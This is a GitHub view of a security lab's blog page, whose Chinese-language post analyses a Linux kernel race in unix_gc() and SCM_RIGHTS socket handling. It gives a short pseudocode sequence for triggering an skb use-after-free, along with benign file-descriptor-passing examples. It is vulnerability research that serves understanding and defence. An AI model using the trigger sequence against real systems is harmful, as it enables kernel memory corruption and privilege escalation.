-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathindex.html
More file actions
1958 lines (1562 loc) · 646 KB
/
index.html
File metadata and controls
1958 lines (1562 loc) · 646 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-114832940-2', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
<title>IceSword Lab</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="IceSword Lab | 冰刃实验室">
<meta property="og:type" content="website">
<meta property="og:title" content="IceSword Lab">
<meta property="og:url" content="http://yoursite.com/index.html">
<meta property="og:site_name" content="IceSword Lab">
<meta property="og:description" content="IceSword Lab | 冰刃实验室">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="IceSword Lab">
<meta name="twitter:card" content="summary">
<link rel="alternate" href="/atom.xml" title="IceSword Lab" type="application/atom+xml">
<link rel="icon" href="/favicon.ico">
<link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="css/style.css">
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
<div id="container">
<div id="wrap">
<header id="header">
<div id="banner"></div>
<div id="header-outer" class="outer">
<div id="header-title" class="inner">
<h1 id="logo-wrap">
<a href="index.html" id="logo">IceSword Lab</a>
</h1>
<h2 id="subtitle-wrap">
<a href="index.html" id="subtitle">Work hard in silence , let success make the noise.</a>
</h2>
</div>
<div id="header-inner" class="inner">
<nav id="main-nav">
<a id="main-nav-toggle" class="nav-icon"></a>
<a class="main-nav-link" href="index.html">Home</a>
<a class="main-nav-link" href="/archives">Archives</a>
<a class="main-nav-link" href="/research">Research</a>
<a class="main-nav-link" href="/vulnerabilities">Vulnerabilities</a>
<a class="main-nav-link" href="/recruitment">Recruitment</a>
<a class="main-nav-link" href="/about">About</a>
</nav>
<nav id="sub-nav">
<a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
<a id="nav-search-btn" class="nav-icon" title="Search"></a>
</nav>
<div id="search-form-wrap">
<form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit"></button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
</div>
</div>
</div>
</header>
<div class="outer">
<section id="main">
<article id="post-2023/03/10/race_windown" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/03/10/race_windown/" class="article-date">
<time datetime="2023-03-10T14:00:00.000Z" itemprop="datePublished">2023-03-10</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/03/10/race_windown/">Linux 内核利用技巧 Racing against the clock</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>author: 熊潇 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
<h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p>原文: <strong><a href="https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html" target="_blank" rel="noopener">Racing against the clock – hitting a tiny kernel race window</a></strong></p>
<ul>
<li>Part.1: 漏洞原理简述</li>
<li>Part.2: 对比较容易产生疑惑的地方增加了细节说明</li>
<li>Part.3: 针对文中提高 race 的技巧做了分析</li>
</ul>
<h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part.1"></a>Part.1</h2><p><strong>The bug & race</strong> </p>
<blockquote>
<p>The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.</p>
<p>The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using <code>get_file_rcu()</code> / <code>get_file_rcu_many()</code> by <code>__fget_files()</code> as long as the refcount is non-zero.</p>
</blockquote>
<ul>
<li><code>unix_gc()</code> 的预期逻辑是: <code>total_refs</code> 和 <code>inflight_refs</code> 相同就可以认为此时 <code>file</code> 是单独占有的,就可以把 <code>skb</code> 和 <code>file</code> 一起 free 掉</li>
<li>下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功</li>
<li>如果 race 没有成功,<code>__fget_files</code> 那里就会发现 <code>f_count</code> 是 0 或者 file 是 NULL</li>
<li>但是如果 race 成功的话,<code>file->f_count</code> 在 <code>__fget_files()</code> 中会被加 1 ,在 <code>unix_gc</code> 后面的代码中就不会被释放 <code>file</code> 的内存,而只是把 <code>f_count</code> 减 1,这也意味着在 <code>close()</code> 之后依然可以 <code>dup()</code> 成功</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">dup() -> __fget_files()</span><br><span class="line"> file = files_lookup_fd_rcu(files, fd); <span class="comment">// fdt->fd[fd] (1)</span></span><br><span class="line"> ...</span><br><span class="line"> get_file_rcu_many(file, refs) <span class="comment">// update: f_count+1 (2)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">close</span>() -> unix_gc()</span><br><span class="line"> list_for_each_entry_safe(u, next, &gc_inflight_list, link) {</span><br><span class="line"> total_refs = file_count(u->sk.sk_socket->file); <span class="comment">// read f_count: 1 (3)</span></span><br><span class="line"> inflight_refs = atomic_long_read(&u->inflight); <span class="comment">// inflight_refs: 1</span></span><br><span class="line"> ...</span><br><span class="line"> <span class="keyword">if</span> (total_refs == inflight_refs) { <span class="comment">// compare </span></span><br><span class="line"> list_move_tail(&u->link, &gc_candidates);</span><br><span class="line"> ...</span><br></pre></td></tr></table></figure>
<p><strong>unix_gc() 中 file 和 skb 没有同步释放可能造成的影响?</strong></p>
<p>下面这个方式可以触发 skb UAF: </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">socketpair() <span class="comment">// 获取 socket pair fds: 3, 4</span></span><br><span class="line">sendmsg(<span class="number">4</span>, <span class="number">3</span>) <span class="comment">// 通过 fd 4 发送 fd 3</span></span><br><span class="line"> -> skb_queue_tail(&other->sk_receive_queue, skb); <span class="comment">// other 是 fd 4 的 peer 也就是 fd 3, skb 保存了 fd 4 发送的内容也是 fd 3</span></span><br><span class="line"><span class="built_in">close</span>(<span class="number">3</span>) | dup(<span class="number">3</span>) <span class="comment">// close 和 dup 存在 race,dup 如果 race 成功会返回 fd 3</span></span><br><span class="line">recvmsg(<span class="number">3</span>) <span class="comment">// 通过 fd 3 接收 fd 4 发送的 skb</span></span><br><span class="line"> -> last = skb = skb_peek(&sk->sk_receive_queue); <span class="comment">// 此时 skb 对应的内存已经被 free 了</span></span><br></pre></td></tr></table></figure>
<p>skb uaf:</p>
<ul>
<li>allocated in: <code>sendmsg() -> unix_stream_sendmsg()</code></li>
<li>freed in: <code>close() -> unix_gc()</code></li>
<li>uafed in: <code>recvmsg() -> unix_stream_read_generic()</code></li>
</ul>
<h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part.2"></a>Part.2</h2><h3 id="SCM-RIGHTS-unix-socket"><a href="#SCM-RIGHTS-unix-socket" class="headerlink" title="SCM_RIGHTS unix socket"></a>SCM_RIGHTS unix socket</h3><blockquote>
<p><code>SCM_RIGHTS</code> is a <strong>socket control message</strong> used for <strong>passing file descriptors</strong> between processes over a UNIX domain socket.</p>
<p>It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.</p>
</blockquote>
<ul>
<li><p>example</p>
<ul>
<li><p>sender.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/socket.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/types.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/stat.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><errno.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/un.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (argc < <span class="number">2</span>) {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Usage: %s <file_path>\n"</span>, argv[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> *file_path = argv[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> sock = socket(AF_UNIX, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"socket"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_un</span> <span class="title">addr</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&addr, <span class="number">0</span>, <span class="keyword">sizeof</span>(addr));</span><br><span class="line"> addr.sun_family = AF_UNIX;</span><br><span class="line"> <span class="built_in">strncpy</span>(addr.sun_path, <span class="string">"/tmp/file_transfer.sock"</span>, <span class="keyword">sizeof</span>(addr.sun_path) - <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">connect</span>(sock, (struct sockaddr *) &addr, <span class="keyword">sizeof</span>(addr)) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"connect"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> fd = <span class="built_in">open</span>(file_path, O_RDONLY);</span><br><span class="line"> <span class="keyword">if</span> (fd == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"open"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> <span class="title">msg</span> = {</span><span class="number">0</span>};</span><br><span class="line"> <span class="keyword">char</span> buf[CMSG_SPACE(<span class="keyword">sizeof</span>(fd))];</span><br><span class="line"> <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> <span class="title">io</span> = {</span> .iov_base = <span class="string">"hello"</span>, .iov_len = <span class="number">5</span> };</span><br><span class="line"> msg.msg_iov = &io;</span><br><span class="line"> msg.msg_iovlen = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> msg.msg_control = buf;</span><br><span class="line"> msg.msg_controllen = <span class="keyword">sizeof</span>(buf);</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">cmsghdr</span> *<span class="title">cmsg</span> = <span class="title">CMSG_FIRSTHDR</span>(&<span class="title">msg</span>);</span></span><br><span class="line"> cmsg->cmsg_level = SOL_SOCKET;</span><br><span class="line"> cmsg->cmsg_type = SCM_RIGHTS;</span><br><span class="line"> cmsg->cmsg_len = CMSG_LEN(<span class="keyword">sizeof</span>(fd));</span><br><span class="line"> *((<span class="keyword">int</span> *) CMSG_DATA(cmsg)) = fd;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (sendmsg(sock, &msg, <span class="number">0</span>) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"sendmsg"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="built_in">close</span>(fd);</span><br><span class="line"> <span class="built_in">close</span>(sock);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
<li><p>recver.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/socket.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/types.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/stat.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><errno.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/un.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"> <span class="keyword">int</span> sock = socket(AF_UNIX, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"socket"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_un</span> <span class="title">addr</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&addr, <span class="number">0</span>, <span class="keyword">sizeof</span>(addr));</span><br><span class="line"> addr.sun_family = AF_UNIX;</span><br><span class="line"> <span class="built_in">strncpy</span>(addr.sun_path, <span class="string">"/tmp/file_transfer.sock"</span>, <span class="keyword">sizeof</span>(addr.sun_path) - <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (bind(sock, (struct sockaddr *) &addr, <span class="keyword">sizeof</span>(addr)) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"bind"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">listen</span>(sock, <span class="number">1</span>) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"listen"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> client_sock = accept(sock, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line"> <span class="keyword">if</span> (client_sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"accept"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> buf[<span class="number">256</span>];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> <span class="title">io</span> = {</span> .iov_base = buf, .iov_len = <span class="keyword">sizeof</span>(buf) };</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> <span class="title">msg</span> = {</span></span><br><span class="line"> .msg_iov = &io,</span><br><span class="line"> .msg_iovlen = <span class="number">1</span></span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> control[CMSG_SPACE(<span class="keyword">sizeof</span>(<span class="keyword">int</span>))];</span><br><span class="line"> msg.msg_control = control;</span><br><span class="line"> msg.msg_controllen = <span class="keyword">sizeof</span>(control);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (recvmsg(client_sock, &msg, <span class="number">0</span>) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"recvmsg"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">cmsghdr</span> *<span class="title">cmsg</span> = <span class="title">CMSG_FIRSTHDR</span>(&<span class="title">msg</span>);</span></span><br><span class="line"> <span class="keyword">if</span> (cmsg == <span class="literal">NULL</span> || cmsg->cmsg_type != SCM_RIGHTS) {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Invalid message\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">int</span> fd = *((<span class="keyword">int</span> *) CMSG_DATA(cmsg));</span><br><span class="line"> <span class="keyword">if</span> (fd == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"No file descriptor received"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Do something with the received file descriptor</span></span><br><span class="line"> <span class="keyword">char</span> buf2[<span class="number">256</span>];</span><br><span class="line"> <span class="keyword">ssize_t</span> bytes_read;</span><br><span class="line"> <span class="keyword">while</span> ((bytes_read = <span class="built_in">read</span>(fd, buf2, <span class="keyword">sizeof</span>(buf2))) > <span class="number">0</span>) {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, buf2);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="built_in">close</span>(fd);</span><br><span class="line"> <span class="built_in">close</span>(client_sock);</span><br><span class="line"> <span class="built_in">close</span>(sock);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<h3 id="Unix-socket-sendmsg-and-recvmsg"><a href="#Unix-socket-sendmsg-and-recvmsg" class="headerlink" title="Unix socket sendmsg() and recvmsg()"></a>Unix socket <code>sendmsg()</code> and <code>recvmsg()</code></h3><ul>
<li>用于发送和接收 <code>SCM_RIGHTS</code> unix socket 数据的主要处理函数是: <code>unix_stream_sendmsg</code> 和 <code>unix_stream_read_generic</code></li>
<li>特殊的地方在于:<ul>
<li><code>sendmsg</code> 的时候会创建 <code>skb</code> 并放在全局列表 <code>gc_inflight_list</code> 和接收端的 <code>sk_receive_queue</code> 上</li>
<li>发送的 <code>fd</code> 对应的 <code>file</code> 会绑定到 <code>skb</code> 上(<code>f_count</code> 也会加 1)</li>
<li><code>recvmsg</code> 的时候从 <code>sk_receive_queue</code> 取 <code>skb</code></li>
<li><code>unix_gc</code> 则从 <code>gc_inflight_list</code> 取 <code>skb</code></li>
</ul>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// net/socket.c</span></span><br><span class="line">sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec() </span><br><span class="line"> -> <span class="comment">// sock->ops->sendmsg</span></span><br><span class="line"> unix_stream_sendmsg() <span class="comment">// struct unix_stream_ops </span></span><br><span class="line"> **__scm_send()** </span><br><span class="line"> scm_fp_copy()</span><br><span class="line"> fget_raw(fd)</span><br><span class="line"> ...</span><br><span class="line"> __fget_files() <span class="comment">// 每个被传递的 fd 引用加 1</span></span><br><span class="line"> other = unix_peer(sk);</span><br><span class="line"> skb = sock_alloc_send_pskb()</span><br><span class="line"> **unix_scm_to_skb()**</span><br><span class="line"> unix_attach_fds() <span class="comment">// fd 与 skb 绑定</span></span><br><span class="line"> unix_inflight()</span><br><span class="line"> list_add_tail(&u->link, &**gc_inflight_list**); <span class="comment">// unix_gc 处理的队列 </span></span><br><span class="line"> **skb->destructor = unix_destruct_scm;** <span class="comment">// 注册 skb destruct</span></span><br><span class="line">**** skb_queue_tail(&other->**sk_receive_queue**, skb); <span class="comment">// skb 直接放到 peer 的 sk_receive_queue 队列上</span></span><br></pre></td></tr></table></figure>
